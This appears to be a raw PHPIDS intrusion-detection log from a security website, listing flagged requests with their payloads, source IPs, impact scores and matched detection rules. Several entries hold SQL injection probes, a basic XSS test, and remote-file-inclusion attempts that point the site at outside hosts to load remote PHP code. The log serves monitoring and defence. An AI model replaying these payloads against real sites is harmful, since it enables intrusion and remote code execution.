Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122438
Name:GET.page
Value:security/networkprinterhacking and 1=0 union select 1,2/*
Page:/i.php?page=security/networkprinterhacking+and+1=0+union+select+1,2/*
IP:87.99.108.101
Impact:26
Created:2010-04-24 10:01:46
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122435
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:51:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122436
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:51:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122433
Name:REQUEST.page
Value:videos/owasp-top-5 and 0=1 union select -louisville
Page:/i.php?page=videos/owasp-top-5+and+0=1+union+select+-louisville
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:51:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122434
Name:GET.page
Value:videos/owasp-top-5 and 0=1 union select -louisville
Page:/i.php?page=videos/owasp-top-5+and+0=1+union+select+-louisville
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:51:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122431
Name:REQUEST.page
Value:security%2 and 0=1 union select Fphpids-install-notes
Page:/i.php?page=security%252+and+0=1+union+select+Fphpids-install-notes&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A%20IrongeeksSecuritySite%20%28Irongeek%27s%20Security%20Site%29
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:50:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122432
Name:GET.page
Value:security%2 and 0=1 union select Fphpids-install-notes
Page:/i.php?page=security%252+and+0=1+union+select+Fphpids-install-notes&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A%20IrongeeksSecuritySite%20%28Irongeek%27s%20Security%20Site%29
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:50:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122429
Name:REQUEST.page
Value:security/wigletogoogleearth and 0=1 union select
Page:/i.php?page=security/wigletogoogleearth+and+0=1+union+select+
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:50:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122430
Name:GET.page
Value:security/wigletogoogleearth and 0=1 union select
Page:/i.php?page=security/wigletogoogleearth+and+0=1+union+select+
IP:117.2.4.180
Impact:20
Created:2010-04-24 08:50:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122427
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.39
Impact:12
Created:2010-04-24 06:11:51
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122428
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.39
Impact:12
Created:2010-04-24 06:11:51
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122425
Name:REQUEST.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 06:10:22
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122426
Name:GET.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 06:10:22
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122423
Name:REQUEST.page
Value:1--
Page:/i.php?page=1--
IP:66.249.67.227
Impact:6
Created:2010-04-24 05:58:49
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122424
Name:GET.page
Value:1--
Page:/i.php?page=1--
IP:66.249.67.227
Impact:6
Created:2010-04-24 05:58:49
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122421
Name:REQUEST.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 05:35:14
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122422
Name:GET.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 05:35:14
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122419
Name:REQUEST.page
Value:security/networkprinterhacking' and 1=2 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=2%20and%20''='
IP:114.139.69.133
Impact:46
Created:2010-04-24 04:46:59
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122420
Name:GET.page
Value:security/networkprinterhacking' and 1=2 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=2%20and%20''='
IP:114.139.69.133
Impact:46
Created:2010-04-24 04:46:59
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122417
Name:REQUEST.page
Value:security/networkprinterhacking' and 1=1 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=1%20and%20''='
IP:114.139.69.133
Impact:46
Created:2010-04-24 04:46:55
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122418
Name:GET.page
Value:security/networkprinterhacking' and 1=1 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=1%20and%20''='
IP:114.139.69.133
Impact:46
Created:2010-04-24 04:46:55
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122415
Name:REQUEST.page
Value:security/pebuilderFirefoxHTML\Shell\Open\Command
Page:/i.php?page=security/pebuilderFirefoxHTML%5cShell%5cOpen%5cCommand
IP:67.195.111.36
Impact:6
Created:2010-04-24 04:29:25
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:122416
Name:GET.page
Value:security/pebuilderFirefoxHTML\Shell\Open\Command
Page:/i.php?page=security/pebuilderFirefoxHTML%5cShell%5cOpen%5cCommand
IP:67.195.111.36
Impact:6
Created:2010-04-24 04:29:25
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:122413
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:85.150.132.70
Impact:10
Created:2010-04-24 03:42:43
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122414
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:85.150.132.70
Impact:10
Created:2010-04-24 03:42:43
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122411
Name:REQUEST.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 03:24:42
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122412
Name:GET.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 03:24:42
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122409
Name:REQUEST.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 02:58:47
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122410
Name:GET.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 02:58:47
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122407
Name:REQUEST.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 02:49:47
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122408
Name:GET.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 02:49:47
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122405
Name:REQUEST.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 02:28:41
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122406
Name:GET.page
Value:ftp://66.193.142.109/DEV/rox.php???
Page:/i.php?page=ftp://66.193.142.109/DEV/rox.php???
IP:201.68.140.191
Impact:10
Created:2010-04-24 02:28:41
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122403
Name:REQUEST.codeme
Value:<script>alert("test")</script>
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:71.112.88.9
Impact:52
Created:2010-04-23 23:43:26
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

ID:122404
Name:POST.codeme
Value:<script>alert("test")</script>
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:71.112.88.9
Impact:52
Created:2010-04-23 23:43:26
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

ID:122401
Name:REQUEST.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:66.249.67.227
Impact:10
Created:2010-04-23 23:12:35
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122402
Name:GET.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:66.249.67.227
Impact:10
Created:2010-04-23 23:12:35
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122399
Name:REQUEST.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking+network+printers%3C/a%3E%0A%09by+northpole%3Cbr%3E%0A%09%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-04-23 21:31:13
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122400
Name:GET.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking+network+printers%3C/a%3E%0A%09by+northpole%3Cbr%3E%0A%09%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-04-23 21:31:13
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122397
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated+target=_parent+%3EIronGeek.com+Hacking+Illustrated%3C/a%3E%0D%0A%09%09%09%09++++%3Cbr%3E%0D%0A%0D%0A%09%09%09%09++++%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-04-23 21:09:27
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122398
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated+target=_parent+%3EIronGeek.com+Hacking+Illustrated%3C/a%3E%0D%0A%09%09%09%09++++%3Cbr%3E%0D%0A%0D%0A%09%09%09%09++++%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-04-23 21:09:27
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122393
Name:REQUEST.page
Value:security/networkprinterhacking//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-23 20:36:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122394
Name:REQUEST.page
Value:security//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-23 20:36:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122395
Name:GET.page
Value:security/networkprinterhacking//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-23 20:36:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122396
Name:GET.page
Value:security//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//prepend.php?_PX_config[manager_path]=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-23 20:36:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122391
Name:REQUEST.page
Value:"><HR>
Page:/i.php?page=%22%3E%3CHR%3E
IP:66.249.67.227
Impact:8
Created:2010-04-23 20:33:12
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

ID:122392
Name:GET.page
Value:"><HR>
Page:/i.php?page=%22%3E%3CHR%3E
IP:66.249.67.227
Impact:8
Created:2010-04-23 20:33:12
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

ID:122389
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-23 20:16:09
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122390
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-23 20:16:09
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122387
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:116.110.228.24
Impact:20
Created:2010-04-23 20:06:59
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122388
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:116.110.228.24
Impact:20
Created:2010-04-23 20:06:59
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122385
Name:REQUEST.SRCHHPGUSR
Value:NEWWND=0&ADLT=OFF&NRSLT=50
Page:/browserinfo.php
IP:208.80.193.60
Impact:10
Created:2010-04-23 18:11:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122386
Name:COOKIE.SRCHHPGUSR
Value:NEWWND=0&ADLT=OFF&NRSLT=50
Page:/browserinfo.php
IP:208.80.193.60
Impact:10
Created:2010-04-23 18:11:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122383
Name:REQUEST.page
Value:videos/building-a-hacklab
Page:/i.php?page=videos/building-a-hacklab%00
IP:66.249.67.149
Impact:10
Created:2010-04-23 18:00:28
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122384
Name:GET.page
Value:videos/building-a-hacklab
Page:/i.php?page=videos/building-a-hacklab%00
IP:66.249.67.149
Impact:10
Created:2010-04-23 18:00:28
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122371
Name:REQUEST.__gads
Value:ID=4697c2c003322ddd:T=1272063578:S=ALNI_MZAQvEK_snLyAIu6dszk0XsBel2bg
Page:/i.php?mode=print&page=fitness/images/met-rxbar.jpg
IP:64.124.148.182
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:122372
Name:REQUEST.__gads
Value:ID=4697c2c003322ddd:T=1272063578:S=ALNI_MZAQvEK_snLyAIu6dszk0XsBel2bg
Page:/i.php?page=fitness/images/opwhey.jpg
IP:64.124.148.184
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:122373
Name:REQUEST.myfinds
Value:a:3:{i:10;a:3:{s:27:"energy star air conditioner";a:1:{s:8:"metadata";s:27:"energy star air conditioner";}s:31:"sharp 12000 btu air conditioner";a:1:{s:8:"metadata";s:31:"sharp 12000 btu air conditioner";}s:32:"sharp 14,500 btu air conditioner";a:1:{s:8:"metadata";s:32:"sharp 14,500 btu air conditioner";}}i:1;a:2:{s:15:"324186673486728";a:1:{s:8:"metadata";s:0:"";}s:15:"271814026418533";a:1:{s:8:"metadata";s:0:"";}}i:2;N;}
Page:/i.php?mode=print&page=fitness/images/met-rxbar.jpg
IP:64.124.148.182
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3

ID:122374
Name:REQUEST.myfinds
Value:a:3:{i:10;a:3:{s:27:"energy star air conditioner";a:1:{s:8:"metadata";s:27:"energy star air conditioner";}s:31:"sharp 12000 btu air conditioner";a:1:{s:8:"metadata";s:31:"sharp 12000 btu air conditioner";}s:32:"sharp 14,500 btu air conditioner";a:1:{s:8:"metadata";s:32:"sharp 14,500 btu air conditioner";}}i:1;a:2:{s:15:"324186673486728";a:1:{s:8:"metadata";s:0:"";}s:15:"271814026418533";a:1:{s:8:"metadata";s:0:"";}}i:2;N;}
Page:/i.php?page=fitness/images/opwhey.jpg
IP:64.124.148.184
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3

ID:122375
Name:REQUEST.userlists
Value:{"recent_searches":[[4,"energy star air conditioner","energy star air conditioner"],[4,"sharp 12000 btu air conditioner","sharp 12000 btu air conditioner"],[4,"sharp 14,500 btu air conditioner","sharp 14,500 btu air conditioner"],[4,"16471667985893622725","michael jackson discography"],[4,"2280771579875657745","where would I find a complete discography of Mahalia Jackson"]],"recent_products":[[1,"324186673486728"],[1,"271814026418533"]]}
Page:/i.php?mode=print&page=fitness/images/met-rxbar.jpg
IP:64.124.148.182
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.4642857142857

ID:122376
Name:REQUEST.userlists
Value:{"recent_searches":[[4,"energy star air conditioner","energy star air conditioner"],[4,"sharp 12000 btu air conditioner","sharp 12000 btu air conditioner"],[4,"sharp 14,500 btu air conditioner","sharp 14,500 btu air conditioner"],[4,"16471667985893622725","michael jackson discography"],[4,"2280771579875657745","where would I find a complete discography of Mahalia Jackson"]],"recent_products":[[1,"324186673486728"],[1,"271814026418533"]]}
Page:/i.php?page=fitness/images/opwhey.jpg
IP:64.124.148.184
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.4642857142857

ID:122377
Name:COOKIE.__gads
Value:ID=4697c2c003322ddd:T=1272063578:S=ALNI_MZAQvEK_snLyAIu6dszk0XsBel2bg
Page:/i.php?mode=print&page=fitness/images/met-rxbar.jpg
IP:64.124.148.182
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:122378
Name:COOKIE.__gads
Value:ID=4697c2c003322ddd:T=1272063578:S=ALNI_MZAQvEK_snLyAIu6dszk0XsBel2bg
Page:/i.php?page=fitness/images/opwhey.jpg
IP:64.124.148.184
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:122379
Name:COOKIE.myfinds
Value:a:3:{i:10;a:3:{s:27:"energy star air conditioner";a:1:{s:8:"metadata";s:27:"energy star air conditioner";}s:31:"sharp 12000 btu air conditioner";a:1:{s:8:"metadata";s:31:"sharp 12000 btu air conditioner";}s:32:"sharp 14,500 btu air conditioner";a:1:{s:8:"metadata";s:32:"sharp 14,500 btu air conditioner";}}i:1;a:2:{s:15:"324186673486728";a:1:{s:8:"metadata";s:0:"";}s:15:"271814026418533";a:1:{s:8:"metadata";s:0:"";}}i:2;N;}
Page:/i.php?mode=print&page=fitness/images/met-rxbar.jpg
IP:64.124.148.182
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3

ID:122380
Name:COOKIE.myfinds
Value:a:3:{i:10;a:3:{s:27:"energy star air conditioner";a:1:{s:8:"metadata";s:27:"energy star air conditioner";}s:31:"sharp 12000 btu air conditioner";a:1:{s:8:"metadata";s:31:"sharp 12000 btu air conditioner";}s:32:"sharp 14,500 btu air conditioner";a:1:{s:8:"metadata";s:32:"sharp 14,500 btu air conditioner";}}i:1;a:2:{s:15:"324186673486728";a:1:{s:8:"metadata";s:0:"";}s:15:"271814026418533";a:1:{s:8:"metadata";s:0:"";}}i:2;N;}
Page:/i.php?page=fitness/images/opwhey.jpg
IP:64.124.148.184
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3

ID:122381
Name:COOKIE.userlists
Value:{"recent_searches":[[4,"energy star air conditioner","energy star air conditioner"],[4,"sharp 12000 btu air conditioner","sharp 12000 btu air conditioner"],[4,"sharp 14,500 btu air conditioner","sharp 14,500 btu air conditioner"],[4,"16471667985893622725","michael jackson discography"],[4,"2280771579875657745","where would I find a complete discography of Mahalia Jackson"]],"recent_products":[[1,"324186673486728"],[1,"271814026418533"]]}
Page:/i.php?mode=print&page=fitness/images/met-rxbar.jpg
IP:64.124.148.182
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.4642857142857

ID:122382
Name:COOKIE.userlists
